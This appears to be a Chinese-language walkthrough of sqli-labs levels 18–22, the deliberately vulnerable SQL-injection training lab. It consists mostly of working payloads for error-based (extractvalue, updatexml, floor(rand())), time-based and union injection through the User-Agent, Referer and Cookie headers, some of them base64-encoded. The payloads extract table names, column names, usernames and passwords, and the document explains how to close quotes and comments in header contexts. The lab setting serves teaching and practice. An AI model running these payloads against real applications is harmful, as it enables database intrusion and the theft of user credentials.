爆表: ' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and ' 爆列名: ' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'))) and ' 爆列名: ' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'))) and ' 数据显示不全:(extractvalue()/updatexml() 的 XPATH 报错信息最多只回显 32 个字符,开头的 0x7e 也占其中 1 位,所以 group_concat 结果过长时会被截断;可以用 substr()/mid() 按偏移分段读取,或者像下面这样用 not in 排除已经爆出的用户分批读取。注意 sqli-labs 自带的用户名是 Angelina,这里的 'Angelinal' 疑为笔误,写错会导致该用户被重复带出) ' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelinal')))) and '
同理可以用 updatexml() 注入(报错回显同样只有 32 个字符):
' and updatexml(1,concat('#',(database())),0) and '
注意:这里的注入点是 HTTP 头而不是 URL 参数,不会经过 URL 解码,+ 不会被还原成空格。URL 里常用的 --+ 正是依赖 + 解码成空格让 MySQL 看到 "-- "(-- 注释后面必须跟空白),在请求头里 + 会原样保留导致注释失效,所以末尾要改用 # 或者带一个真实空格的 "-- "。
数据库: ' or updatexml(1,concat('#',(database())),0),' ',' ')-- # ' and updatexml(1,concat('#',(database())),0),' ',' ')-- # 爆表: ' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'','')# 爆字段 ' and updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'','')-- # 爆数据: ' and updatexml(1,concat('#',(select * from (select concat_ws('#',id,username,password) from users limit 0,1) a)),0),'','')-- # 把 limit 0,1 的偏移依次改成 1,1、2,1 … 即可逐行爆出其他用户和密码(一次只取一行也避免了 32 字符截断)。说明:payload 末尾的 ,' ',' ') 或 ,'','') 是为了把被注入的 INSERT ... VALUES(...) 剩余的列补齐并闭合括号,补的值个数要与注入列之后剩余的列数一致,否则 SQL 语法错误;括号闭合后再用 -- # 或 # 把原语句剩余部分注释掉。
子查询注入(即 floor(rand()) 双查询报错注入:group by 对 rand() 结果分组时会触发 "Duplicate entry 'xxx' for key 'group_key'" 报错,user() 的值就在 xxx 里。不带种子的 rand() 报错是概率性的,失败时多发几次;改用 rand(0) 可以稳定复现,见下一关。另外 from 的表至少要有 3 行,information_schema.tables 满足):
' and (select 1 from (select count(*),concat_ws('-',(select user()),floor(rand()*2))as a from information_schema.tables group by a) b) and '
less-19基于头部的Referer POST报错注入
与上一关基本相似,只是注入点换成了 Referer 头;从下面的 payload 看,这关被注入的 INSERT 语句只需再补一个 '' 值就能闭合。
extractvalue()注入---暴库 ' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and ' updatexml()注入--暴表 ' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'')# ' and updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'')# 子查询注入---暴字段(这里用 rand(0) 代替 rand(),报错可以稳定复现;limit 1,1 取第二个字段,改偏移可逐个取其他字段) ' and (select 1 from(select count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x)a) and ' 延时注入(注意 if(条件,1,sleep(5)) 是条件为假时才延时 5 秒,判断时不要搞反;想在条件为真时延时就写成 if(条件,sleep(5),1)): ' or if(length(database())=8,1,sleep(5)) and '
Cookie: uname=Dumb' order by 4 -- # 回显Unknown column '4' in 'order clause',说明查询结果只有 3 列
Cookie: uname=Dumb' order by 3 -- #
Cookie: uname=D2' union select 1,2,3 #
login name和passwd这里有回显:union 的第 2、3 列会显示在这两个位置。注意前面用的 D2(以及下面的 1)是不存在的用户名,原查询查不到记录时 union 出来的那一行才会被显示。
数据库: Cookie: uname=1' union select 1,2,database() -- # 暴表: uname=1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security' -- # 暴字段: uname=1' union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users' -- #' (末尾多出来的 ' 已在注释里,不影响执行) 暴数据:(这两种其实是一样的,只是拼接方式和表的写法不同;第二条里 # 之后的 -- # 已经处于注释中,可以省略) uname=1' union select 1,2,group_concat(username,0x7e,password)from security.users -- # uname=1' union select 1,2,group_concat(concat_ws('-',id,username,password)) from users# -- #
less-21基于base64编码单引号和括号的Cookie注入
发现cookie进行了base64编码 RHVtYg== base64解码后:Dumb
Dumb' or 1=1 --+ 编码后RHVtYicgb3IgMT0xICM= (注意这段 base64 解码出来其实是 Dumb' or 1=1 #,不是 --+;Cookie 里和请求头一样不会做 URL 解码,--+ 本来就不能用,要用 # 或 "-- ")
回显sql语句错误:本关的查询用 ('...') 包裹 Cookie 值,只用单引号闭合会多出一个 ),所以后面的 payload 都要用 ') 闭合。
Dumb') order by 4-- # 编码RHVtYicpIG9yZGVyIGJ5IDQtLSAj
Dumb') order by 3-- # 编码 RHVtYicpIG9yZGVyIGJ5IDMtLSAj
1') union select 1,2,3-- # 编码MScpIHVuaW9uIHNlbGVjdCAxLDIsMy0tICM=
less-22基于错误的双引号字符型Cookie注入
除了闭合符改成双引号 "(不再需要括号)以外,其他和上一关基本一致;payload 同样要先 base64 编码再放进 Cookie。
1" or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))-- # 编码 MSIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSwweDdlKSktLSAj